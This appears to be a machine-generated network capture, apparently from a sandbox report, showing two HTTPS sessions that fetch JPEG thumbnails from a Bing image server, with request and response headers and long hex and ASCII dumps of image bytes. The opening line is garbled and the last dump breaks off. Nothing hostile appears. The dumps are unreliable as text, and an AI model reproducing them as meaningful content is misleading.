>.I_.\|_~RB/A7~}ry?<ibv%;/?yogyk%WHZ`VF[}Bx\|h~oWohqJ<*KeH_/z?VmC'[_7]/mVePh/uY~kgo2wg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49728	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:19 UTC	346	OUT	GET /th?id=OADD2.10239399230510_1EL19IE1YUCVQBSJB&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-08 12:31:19 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 452818 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: B49A7E905C72498A8F5A4F12454BA916 Ref B: EWR30EDGE0908 Ref C: 2024-12-08T12:31:19Z Date: Sun, 08 Dec 2024 12:31:18 GMT Connection: close
2024-12-08 12:31:19 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 39 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 34 3a 30 38 3a 30 36 20 30 39 3a 34 37 3a 32 35 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 25.9 (Windows)2024:08:06 09:47:258C
2024-12-08 12:31:19 UTC	16384	IN	Data Raw: 8c 3f 61 57 8f c3 76 69 1c 4b 90 2e ee 62 0f 2c ad fe c2 1e 14 7b 9c 9f a5 79 ae ad ab eb 9e 2d bf 92 ff 00 52 95 ae ee 24 55 52 58 01 85 1d 17 20 70 07 a7 e9 5e 26 2f 3c a7 4d 72 d1 57 67 a1 87 cb aa 54 7e fe 8b f1 3a 6f 89 7f 12 f5 1d 6b 58 9a 2d 22 fa ee c7 44 da 16 1b 68 c8 47 7c 0c 16 91 86 32 49 e7 19 20 57 1a 4c 97 71 e2 df 28 8a 7e 79 0e 5b 27 ae 00 1d 4f e8 2b 43 4e f0 fd c4 4a d2 4e e5 89 fe 11 80 a0 7b 9f 4f ca ad 46 da 7a fe ed ee 73 12 92 a5 60 1b 54 fa 8d dd eb e6 eb 62 25 56 7c d2 77 67 b5 4e 84 69 c7 96 2a c6 6a cf 29 b7 58 d0 79 2a a3 03 23 73 31 ee c1 47 4f a9 a8 ec da e1 99 99 7e d4 ca 0f 32 b4 78 51 ec 0e 30 2b 76 de e7 4d 89 c4 7a 7d bd bc 41 c8 52 18 92 5b 3e a7 af 5a b9 35 a4 e1 37 ea 33 14 55 3b bc a2 fd 31 d3 d8 0f ad 63 be a8 da Data Ascii: ?aWviK.b,{y-R$URX p^&/<MrWgT~:okX-"DhG\|2I WLq(~y['O+CNJN{OFzs`Tb%V\|wgNij)Xy#s1GO~2xQ0+vMz}AR[>Z573U;1c
2024-12-08 12:31:19 UTC	16384	IN	Data Raw: 83 4e c6 3f 1a 00 cd 00 00 62 94 0a 18 52 81 40 06 05 1f 5a 50 3b d2 81 40 06 69 d8 14 d0 29 df c3 40 05 26 31 4a 3d a8 eb 40 05 18 f9 68 c1 a5 1c 75 a0 04 a3 1e 94 ef ad 26 28 18 94 52 af ad 04 d2 61 70 a4 3f 76 8a 33 eb 48 41 ee 68 a0 7a d1 41 41 81 45 03 d4 50 d4 07 51 b4 e0 09 a0 0c 53 97 a5 0c 06 f4 a2 9c 3f 3a 08 cd 45 c0 68 e6 9c 05 36 9d 9e d4 c0 30 4d 2e 0d 26 71 d6 85 eb 40 0b f4 a4 5e b4 ec 0a 14 53 40 14 ec 66 90 0c d2 af 5a 5b 0e c2 8e 69 57 8a 4f ad 2d 2b 8c 17 a5 14 51 48 56 15 69 57 ad 3b 9a 41 ea 69 ec 30 02 97 dc 50 3d a8 a2 e0 28 14 62 96 8c 66 98 0d fe 2c d1 d6 9d 8f 5a 76 0d 00 36 8a 70 1e b4 a0 52 60 37 19 a6 85 3b aa 40 b4 ef 2c d3 0d c6 28 f9 a9 ea 33 d6 94 25 4b 14 2c cd 81 42 88 af 61 8a b9 ed 56 2d 6d 24 95 c2 22 16 63 d0 01 9a Data Ascii: N?bR@ZP;@i)@&1J=@hu&(Rap?v3HAhzAAEPQS?:Eh60M.&q@^S@fZ[iWO-+QHViW;Ai0P=(bf,Zv6pR`7;@,(3%K,BaV-m$"c
2024-12-08 12:31:19 UTC	16384	IN	Data Raw: 9e 5e 73 23 80 a3 ae 7e b5 95 2a bc ad dd 9a 4a 9d d1 a1 67 7d 1d c2 81 10 dd ce dc fb ff 00 f5 aa 5b b4 f3 24 2a 91 ee 55 f5 e4 13 59 1e 1d b7 92 2c a4 24 b2 a2 e5 dd b8 04 f5 3f 85 6a dc 5c bc 70 92 a3 68 c7 3e 95 d7 4e 51 9c 7c 8c 65 17 16 8a 1a e4 4a 61 08 00 03 03 3d 80 3d fa d7 3b ab eb 9a 6e 9c 9b 0f ef 07 f1 14 e5 7f 03 5d 0d cc 30 ea 70 b2 4b 13 4b 18 39 cb 67 6e 7e 9c 03 59 d7 96 16 31 48 91 0b 28 7e 4e 41 11 f6 1f 90 fd 2b a2 9c 69 28 ab 9c f5 5d 46 f4 22 fb 75 a7 d8 63 b9 d8 c4 4a a1 a2 56 18 ea 38 cd 5d b7 d3 44 f2 2b cf 73 b6 32 bb 99 ba 0e 99 ea 78 ab 36 6d 67 69 6c f7 9a ac 91 47 18 c0 8f 77 38 1d f8 e7 da ab 6a d0 5d eb 17 08 63 94 5b 58 0e 51 00 cb cb fe d1 3d 00 f6 a9 97 bd b4 b4 1c 6e b7 57 66 6e b1 ab 7d a6 e2 1d 27 4a 3e 5c 00 e5 df Data Ascii: ^s#~Jg}[$UY,$?j\ph>NQ\|eJa==;n]0pKK9gn~Y1H(~NA+i(]F"ucJV8]D+s2x6mgilGw8j]c[XQ=nWfn}'J>\
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: 2b 72 94 75 7b 87 01 e5 7f 99 62 50 ab b5 76 20 03 b2 af 61 f8 f3 54 ff 00 b4 35 29 ad 63 6b 68 62 f2 d8 8d d2 39 e0 8f 65 1c 9a 9e 58 a7 bd 52 d3 44 a8 8d cb 06 e9 fa 54 13 5d ce 21 4b 6b 3f 97 cb 24 a9 0a 33 93 df 15 8c 2a 39 27 72 e7 1b 16 cc 52 40 de 63 90 09 25 b2 47 6c f1 54 da c6 19 f5 41 73 3c 8f c0 24 83 c9 07 b6 3d 38 a4 1a ac f0 42 c2 e6 73 34 87 23 90 38 f6 15 0d 9c b7 66 e1 1c c4 db 67 60 43 b0 cf 07 a7 e7 55 ec de 9c a8 4e a2 bf bc 6b db 41 69 12 b3 43 1e cd fc 16 c0 ce 4d 34 88 b4 fb 79 2e 5d 0b 33 9d bb 98 f2 7b 90 a3 b0 f7 ab 60 b4 76 e1 50 65 97 39 dc 31 92 3f 90 ac 6b 84 ba ba b8 67 92 4f 31 b9 0a 00 c2 a8 fe ea d4 d5 7c aa dd 4d 23 14 df 91 65 75 64 b8 b5 66 b7 89 93 6b 61 94 75 39 fa fa d4 96 56 cf 75 b1 4e e8 c1 e5 82 9c e0 fa 67 bd Data Ascii: +ru{bPv aT5)ckhb9eXRDT]!Kk?$3*9'rR@c%GlTAs<$=8Bs4#8fg`CUNkAiCM4y.]3{`vPe91?kgO1\|M#eudfkau9VuNg
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: ab a7 da c9 6e 9e 6d dc 9e 64 f8 cf 41 85 27 d2 a3 be 98 06 dc 5f 92 7d 78 ad 63 7b 58 ca a3 4b 60 27 e7 de 49 2c 7b e6 9b 2c fb 72 c5 f0 aa 39 1e be 94 eb 78 05 ca 91 13 f1 9e 5b fc f6 ab 09 63 65 68 eb 3b c4 d3 dc 64 85 56 72 55 7d c0 1c 0f a9 aa dc cf 52 4c 4a d6 f1 7c ec 32 b9 d9 9e f8 f6 ef 52 41 6d 24 50 ee 77 55 55 ed d6 aa c5 77 78 f7 1f bc 30 c2 9d 30 a3 73 7d 39 e0 51 35 c9 67 28 84 36 39 c9 fe 23 e9 c5 55 b9 74 19 24 c6 d1 b5 2d 81 c2 33 27 51 c1 63 ff 00 ea a6 47 68 92 be e5 b7 0a b9 c6 f3 c9 fd 6a 84 82 36 82 4b 5c 91 29 26 43 24 67 3e 50 cf 42 dd 70 3f ad 6a e9 f7 48 2d 51 65 9f 7b 0c 02 c7 fc ff 00 fa ea 2a 68 69 4f 52 c5 c4 70 45 06 c5 dc 49 20 b1 6c 65 b1 d0 1f 6a 6c 8e a1 82 13 85 23 24 d2 39 76 9b 79 91 4a 9e db 3b 54 b6 71 09 24 69 5c Data Ascii: nmdA'_}xc{XK`'I,{,r9x[ceh;dVrU}RLJ\|2RAm$PwUUwx00s}9Q5g(69#Ut$-3'QcGhj6K\)&C$g>PBp?jH-Qe{*hiORpEI lejl#$9vyJ;Tq$i\
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: dd 9f 38 f7 a8 94 92 34 51 6e cc 85 b4 c6 81 3e d1 77 20 8c 30 ca ae 70 c4 7b 0e b5 9f a8 a5 a2 81 89 25 0c 7b 67 8a 9b 52 bc 05 d9 ce 64 61 fc 44 9e 71 f5 ac 7b cb b3 70 e0 05 da 05 11 e6 7b 91 53 95 2b 23 4e d5 f4 b8 ac 37 49 1f 99 3f 4a 8b 4e d3 a5 d5 f5 58 ad ad a2 58 fc d3 8e 06 00 1d c9 23 b0 aa b6 37 d0 5b 46 62 7b 4f 3d 99 b8 6a f4 6f 05 5a 47 a7 69 a2 79 e3 f2 6e 6f 06 48 3f 79 13 ae 3d b3 4f 58 dd 8e 31 e6 45 8b 0b 0d 36 c3 4f 5b 2d 3a 08 db 69 2b 2d c3 fc cf 2b 0e f9 3c 63 da b2 35 c8 b4 f4 e6 e2 05 62 0f ca aa a0 64 fb b6 2b 4f c4 bb 5a 3f 26 da e4 c7 dc ed 03 15 cb de 42 e8 a5 8c ec f8 1f c5 90 2a 39 93 7b 83 56 5b 1a da 55 c5 b5 e1 3f bb 88 47 12 e5 97 68 c7 1d 06 6a fe 8b 68 f7 f7 12 5e dc 47 b6 d9 0e d8 e3 1f 28 70 3b 60 76 ac df 09 5b 44 Data Ascii: 84Qn>w 0p{%{gRdaDq{p{S+#N7I?JNXX#7[Fb{O=joZGiynoH?y=OX1E6O[-:i+-+<c5bd+OZ?&B*9{V[U?Ghjh^G(p;`v[D
2024-12-08 12:31:20 UTC	16067	IN	Data Raw: b4 a5 4d d2 a7 15 bb df e4 6d 89 9c 3d 93 6c 35 3d 6d a3 b9 7f 27 6f 98 4f ca 5d 43 63 e9 9e 33 58 ab 3d fd fd e1 48 4a 8d c7 74 92 ed 00 0f 52 71 81 f8 0a cd d3 a7 2f e2 68 be de 73 6e ce 43 1c f1 83 d0 fe 06 bb ef ec e8 9d 42 c5 1c 71 c4 bd d7 d3 df 15 db 14 e3 3b b6 78 b3 8a 6b 44 62 5b e8 99 4f b4 de 5c dc 3c 6a 40 08 9c 6e cf d2 b5 ae 98 43 0c 70 45 1a 46 81 70 a8 bd 00 ff 00 13 d6 9c c5 64 ba 48 d0 91 0c 40 8c e7 f3 35 3c d0 41 32 99 9e 41 e5 8c 2f 07 f3 ac f1 4e a3 8a 48 78 78 c5 36 73 7e 27 96 67 84 aa b1 1b 80 01 57 bf bd 57 b5 b4 9d e7 42 23 62 c5 06 f2 3b 57 51 3c 16 88 c6 52 17 cb 44 04 31 3c e3 a0 03 d4 93 fa 56 7c d7 c9 16 76 26 17 38 03 d7 eb 4a 8d 26 e2 b9 98 56 a9 69 7b a8 49 a3 86 1b 04 55 06 36 c6 58 e7 91 eb 93 54 2e 5b cb 84 39 72 c5 Data Ascii: Mm=l5=m'oO]Cc3X=HJtRq/hsnCBq;xkDb[O\<j@nCpEFpdH@5<A2A/NHxx6s~'gWWB#b;WQ<RD1<V\|v&8J&Vi{IU6XT.[9r
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: bf e1 9a ca a6 1e 95 1b 4e 3a 1b c2 ad 49 fb b7 29 f8 5f 45 37 ba 5d e3 df 7e f1 65 40 1f 3c 30 39 ce 41 f5 04 66 ba ab 3d 31 62 fb 3e c6 db 0b 28 53 cf cd 9f c7 d7 15 72 28 ac a3 99 ad f6 2a 80 df 32 9f 4c fa 0a c7 be d5 75 08 35 02 92 f9 4d 1a 90 16 30 3e 5c 7a a9 1c d7 0d 4a d5 71 32 7c ba 2e c7 55 4c 3c 68 a5 27 af 99 62 6d 0e 6b c6 bd bb 96 5f b3 c7 66 bb a0 e0 12 c7 3e fd 46 3f 9d 65 49 67 66 72 24 98 b8 ce 70 48 00 91 53 dd 6b 13 ea 09 f6 79 a6 68 ad f2 0b 24 43 00 ff 00 bc 7a 9f c4 d4 76 f1 5b 7d a5 da 3f de 20 38 28 79 20 d5 d3 55 62 bd f7 f7 7f 99 ce f9 66 d2 8f f5 f2 2a dc e9 50 de 47 e6 44 8a b3 47 91 19 23 8c 91 c6 48 ab 90 40 f1 c7 0e f0 c1 d3 19 ef 92 2b 4a d2 10 1b fd 11 c7 23 a3 2d 4c 96 32 bb 6f 7c 02 38 25 7a 11 51 2c 4b b5 9b d0 db ea Data Ascii: N:I)_E7]~e@<09Af=1b>(Sr(2Lu5M0>\zJq2\|.UL<h'bmk_f>F?eIgfr$pHSkyh$Czv[}? 8(y UbfPGDG#H@+J#-L2o\|8%zQ,K
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: 3b d6 96 9f f2 46 4a 23 00 79 c9 e8 3f c2 b2 a9 52 a4 16 8e c5 d0 a5 4a 73 57 57 44 30 e8 16 91 73 1c 56 f9 1d 3e 51 fc aa 64 b0 8c 49 b1 20 85 64 1d 31 1e 33 f8 d4 f3 4f 19 8f c9 46 f3 24 eb b5 0f af 72 7b 0a 6d dc 72 a8 4f 31 86 dd bf 74 65 55 4f a6 e1 ce 7d eb 9f da 54 97 c5 23 be a6 1f 0f 0f 86 26 27 89 99 4c c9 6c e9 86 8c e5 87 d4 71 58 b7 30 a9 3d 01 ab ba f8 03 5a 55 4c a8 08 01 19 cf 39 3c 67 bd 54 99 c8 e5 97 3c 75 1e 95 ea d1 8b 8c 23 63 cb a9 2d cc cb b8 46 c7 8f 68 c3 0c 74 ae 6b 54 80 24 de 87 39 e2 bb 29 00 66 04 0c 56 36 bd 6b be 12 40 c3 0e 95 ea 61 6b 5a 56 67 95 52 37 d8 b1 a4 c2 04 31 05 5c 96 03 03 d6 ba 7b 0b 70 96 e0 3c 43 78 24 f3 58 be 1d 81 4c 70 30 25 89 03 19 ec 2b 6a f6 7d aa 56 34 c3 0e b9 ae 0c 54 9c a7 ca 8e dc 3f b9 1e 66 Data Ascii: ;FJ#y?RJsWWD0sV>QdI d13OF$r{mrO1teUO}T#&'LlqX0=ZUL9<gT<u#c-FhtkT$9)fV6k@akZVgR71\{p<Cx$XLp0%+j}V4T?f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49729	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:19 UTC	375	OUT	GET /th?id=OADD2.10239399230509_1P8TI1N52GIEG4TVD&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-08 12:31:19 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 489386 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 76A49BE2AB18449BA78BC880FBC0E483 Ref B: EWR30EDGE1410 Ref C: 2024-12-08T12:31:19Z Date: Sun, 08 Dec 2024 12:31:19 GMT Connection: close
2024-12-08 12:31:19 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 13 56 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 39 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 34 3a 30 38 3a 30 36 20 30 39 3a 34 36 3a 34 35 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``VExifMM*bj(1r2i``Adobe Photoshop 25.9 (Windows)2024:08:06 09:46:458
2024-12-08 12:31:19 UTC	16384	IN	Data Raw: f4 f4 af 3b bc b5 bf 8b 75 dd c2 db 5a b4 ad 99 6e ef 64 df 2b 13 d4 9c 9f bc 7d ea 25 d4 34 8d 1e 46 b7 b2 89 56 48 d7 f7 92 44 bf 32 fb 6f e4 fe 55 9b 71 a9 c7 34 73 ea 1b 9b 74 6c 3c b5 68 fb 9e ca 5b 2d 9a f9 cc 66 3e b6 26 57 a8 ef 6f b8 f5 f0 f8 5a 54 23 cb 0d cb 7a d4 9a 66 95 71 19 76 6d 42 fd a3 cc 7b be 7f 2f 3d 0e de 82 a0 8f 4a b6 89 be d3 a8 af 9e ac a4 f9 4d 21 5d c7 d4 81 db eb 9a ad 22 5b c5 6b 2e a0 ee cd 2f 1e 63 7f cf 62 3b 7f ba 3a 63 bd 49 a3 da 4b 75 24 57 17 b2 f9 b7 57 d9 f2 a2 dd b5 63 41 fc 4d f8 74 ae 1e 6b ed b9 d7 15 d0 65 e5 f6 a1 78 cb 6d a7 d8 b7 96 cb f2 b7 31 c7 18 1e 80 72 7f 1e 2a e7 87 6e c5 9c cd 15 bd 9a ea 17 3f 72 4b bd bf 24 67 fb 91 47 fc 47 de ac b3 5a 45 63 73 15 b5 ca db 45 b4 c6 d3 b4 7b 95 4f 72 39 f9 ab 2e Data Ascii: ;uZnd+}%4FVHD2oUq4stl<h[-f>&WoZT#zfqvmB{/=JM!]"[k./cb;:cIKu$WWcAMtkexm1r*n?rK$gGGZEcsE{Or9.
2024-12-08 12:31:19 UTC	16384	IN	Data Raw: b9 ad 38 49 ea cb 9a ae c8 15 84 ed e6 5c 48 bb 23 5f ee fd 31 d3 f9 d4 7a 46 88 f2 5d 79 ef 2b 4b 24 4a 7e 9c d3 fc f1 15 9c 53 bd 8b 7d aa 76 03 77 fc f3 e3 24 d2 78 7e ff 00 50 ba 8f cb 45 dd f3 65 9b b7 4f f0 a4 a4 96 8c 6e 2d ca e8 bf fd 91 e5 dc 2c 92 4f e5 46 ab fe aa 35 fb a7 ff 00 66 ac ad 72 1d 36 c6 df fb 53 50 59 e7 8e 09 3f 71 6c 8c 55 a4 72 78 1c 75 e4 d5 d9 a5 7b 88 e3 ce ef f5 9f 79 9b e5 e3 3c e7 8e 0f 4a c4 f1 26 a0 9a 4b 47 a9 6a 13 ad ca db 29 f2 a2 8f fe 5a 4e 7a 60 76 55 5a 25 51 29 25 15 a9 70 a7 cd ac 8d 58 ef 35 09 23 8f ed 11 7d 9a 19 10 9f 22 3f bf 9f 42 6a 1f 0e f9 36 d6 f2 47 24 4d 04 ab b9 da 46 6d cc a3 dd bb 57 13 a5 f8 9f 54 d6 35 a6 96 3b 16 55 5f f6 b8 5f a9 35 db 58 45 3e a5 a6 fd b2 45 66 8d 57 fd 46 ed ab 21 1d cf b5 Data Ascii: 8I\H#_1zF]y+K$J~S}vw$x~PEeOn-,OF5fr6SPY?qlUrxu{y<J&KGj)ZNz`vUZ%Q)%pX5#}"?Bj6G$MFmWT5;U__5XE>EfWF!
2024-12-08 12:31:19 UTC	16384	IN	Data Raw: 67 8c 37 95 6f 2e e5 dd 85 5f e2 ab 7a 7f d8 ed a4 8e 07 5f dc c9 1b 4b 27 99 f3 33 1e 8a 0d 66 5b 43 a7 5c 6b 1f 62 b7 da b2 48 c4 fe eb e5 e9 eb 8a 89 47 da 25 69 0f 99 c3 a1 a9 f6 49 26 b3 5b 68 99 5a 46 fb cd bb ee 8e e2 af d8 84 8a cd 61 12 fc b1 ae 19 97 d4 56 64 7a 7c 76 b2 73 fb d9 64 6f f7 55 7d 87 f8 d6 af f6 76 98 d6 ab 1c b1 32 f7 65 8d 8a f2 7e 95 74 e9 cb 4d 49 94 d7 6d 49 ad e1 fd e2 c8 1b 70 fb b4 89 2f d9 ee 1b 7f cd b5 73 52 b4 b1 c5 0a a1 fd d8 e8 ab ed 55 a1 b6 0e d2 4a 2e 59 95 97 ee b5 54 aa 3d a2 38 c5 5a ec 64 97 af 34 9f b8 5d a5 b8 dc df 7a ac 2c 66 1f 2e 2b 75 f3 24 6e 64 95 be ea 8f ad 54 b5 84 7d ab 10 7f c0 99 aa c6 a9 30 82 ce 58 d1 b7 4c cb f2 af d4 d4 c2 72 6b de 09 41 2d 88 75 81 25 f7 97 1c 1f 75 5b 1b aa c5 bd 97 d9 a1 Data Ascii: g7o._z_K'3f[C\kbHG%iI&[hZFaVdz\|vsdoU}v2e~tMImIp/sRUJ.YT=8Zd4]z,f.+u$ndT}0XLrkA-u%u[
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: bc 6d fb db be 95 52 d6 d8 48 df 68 bb 5f 32 6f f6 bf 86 ad ff 00 c8 43 74 91 cb b4 7f 0e df bd 50 b3 9b 18 71 3b 79 85 bf 8a b6 8d a2 9f 29 8c bd ed c4 b9 9b 6a ec ef 54 92 14 8d 72 57 76 ee 7e 6a 99 8a c9 26 f0 bb bf de a4 98 bc 8d cf cd 54 a4 c9 e5 51 29 bc b1 c7 26 47 cd fd e5 5a 92 e1 84 f6 be 5f 66 a9 1e 18 1a 3f 9f ad 67 34 fb 64 c7 6e 9b 69 f2 dd dd 1b 41 dd 12 69 77 12 45 74 b0 49 fb c0 bf 75 ab 72 49 92 5d ae 37 2b 7f b5 f2 d7 3d 26 f7 e4 2f 96 b5 3d bc 73 ba e1 24 dd e5 ff 00 7b fa 53 92 8b d7 a8 bd 9b 4b 57 a1 ad 71 a8 db a4 9e 58 7f 32 4f e1 8e 3f 9a 96 d8 49 71 b4 dc 7c a3 f8 63 fe ef d6 aa 59 47 18 ba c8 56 42 df 79 97 ef 35 4a b7 6f e6 30 82 29 3e 5f e2 6a 35 d9 18 e8 8b 93 7d dd 89 f2 af fe 85 48 b2 11 1e c1 d6 aa a5 c4 ef 26 0e dc 7f 16 Data Ascii: mRHh_2oCtPq;y)jTrWv~j&TQ)&GZ_f?g4dniAiwEtIurI]7+=&/=s${SKWqX2O?Iq\|cYGVBy5Jo0)>_j5}H&
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: d8 32 a1 e9 fd d4 a9 e3 fb 2d a2 bb 79 f1 b3 3f f7 7e 6f d6 b2 5e 28 0c 8b 2b b6 ef f6 7f 86 af 5b e9 a6 48 56 47 db 1a b2 fc ac d5 9c e9 c6 cb 70 85 47 ad c6 5f dc 62 15 30 c4 b2 7f b2 d5 3e 94 b2 dc ab 30 8b 95 e3 da 93 cb 82 de 45 33 b7 9a bd 17 77 dd fd 29 d7 3a d4 76 52 63 6b 6d fe ec 7f 2e ea a5 4a f1 b2 2f 9b 52 d3 5b 65 96 09 d7 71 6f e1 5e b4 cb fd 3b 47 d3 ad 7c c9 60 f9 ba b2 fd e3 f9 56 26 a1 e2 2d 45 d6 41 65 66 b6 e1 97 fd 6f 98 37 ff 00 2a c0 5b 1d 42 66 5b 8b ad 49 9b 73 67 6c 92 9a e9 a1 46 50 4e f2 48 ce a7 23 77 68 dc 6f 11 de 2c 9e 5d a6 9f e4 47 d3 74 8b bb f4 14 db ab bb d9 d5 5a 4d 42 e5 a4 6e 76 47 18 55 fe 55 0d 8e 98 92 4c ad 1a c7 24 9b be f2 31 c7 d4 d7 4b 6b 0d bd 9c 68 cc bb a5 fe f6 df e9 53 5e b4 21 6b 2b b2 e9 c3 9a e9 6c Data Ascii: 2-y?~o^(+[HVGpG_b0>0E3w):vRckm.J/R[eqo^;G\|`V&-EAefo7*[Bf[IsglFPNH#who,]GtZMBnvGUUL$1KkhS^!k+l
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: b5 a4 6a a7 a3 46 72 a5 a6 e5 45 1e 67 46 a9 12 10 8b 9a ca d5 9e 7d 2e 45 8e 16 dd 1c 9c ab 37 f2 a9 f4 5d 4a 7b a6 f2 e4 5e 17 f8 96 ad c6 5c bc dd 0c f9 a3 7b 1a da 7b 88 a6 6c af fb b5 6d 64 2c dc af 15 43 0e 8d be ac ab b8 8f 8a c9 ab ea 68 a5 d0 99 ff 00 d9 da b5 5a 48 24 76 ff 00 5b ff 00 8e d3 fc f2 17 95 ff 00 81 52 ef 25 78 f9 bf dd a5 aa 1b 69 a1 89 00 2b 82 dc ad 32 6f dd ae da 73 c4 1b ef b3 7f c0 6a 1c 6d 6c 6d dd 54 b6 20 44 5f 9b ef 53 fc b0 cb c2 ee a6 4d b0 2f dd db 4d 59 bc b8 f6 0f e2 aa b6 97 23 41 af 6f 00 6c bc 4b 9a 97 c8 88 2e 42 ad 52 6b ef de 6c 0a d9 ff 00 69 69 be 75 cf 53 2a e2 9e a2 34 76 a0 e3 e5 cd 57 ba b8 23 80 bc 55 36 6b 97 e6 36 5a 7a 45 2b 2e 67 75 5f f6 63 cd 52 89 23 26 5c ae 4b 70 df de a7 69 f6 c2 2f df c8 9b bf Data Ascii: jFrEgF}.E7]J{^\{{lmd,ChZH$v[R%xi+2osjmlmT D_SM/MY#AolK.BRkliiuS*4vW#U6k6ZzE+.gu_cR#&\Kpi/
2024-12-08 12:31:20 UTC	16067	IN	Data Raw: bf 74 55 c7 26 1b 7f 21 15 b0 dc c8 df 74 b5 61 1a bc d2 b9 ac a9 a5 1b 22 66 88 5a c2 c2 f6 75 59 36 e7 74 79 a6 f9 d1 ac d1 03 3b 4a b2 c7 95 dc db aa 3b 85 8d b6 c4 37 4b 26 d1 b9 77 7c ab 48 f0 87 55 fe f2 ff 00 cb 4f ee fd 2b ab 9d 5b 56 62 a9 c9 3d 09 d1 27 f2 e4 60 bb 5a 45 f9 5a 45 f9 56 99 0c 46 c2 3f b3 89 da 7b a9 58 bc 92 37 dd fa 63 d2 86 b7 f9 b7 c9 2b 7c ca 37 2e e3 b5 86 78 fe a6 8d 52 58 a2 5b 8d 50 ee f3 59 44 70 47 fc 4d f8 56 32 dd 38 33 65 b7 bc 8e 67 c4 9a 54 92 78 9a da 4d 42 e5 63 11 a9 db 12 f0 d9 ec 4d 75 5a 3c 76 f6 b1 f1 b9 a6 e7 e5 6f bc b5 5b 41 8e e7 6f db 35 45 8e 49 5b ef 77 55 fc 7d 6b 59 5e 09 a4 f2 e3 89 98 6d fb df 77 75 74 73 36 92 39 e3 1d 5e 85 49 ae ac f4 db a6 44 8a 79 ee 64 5d f2 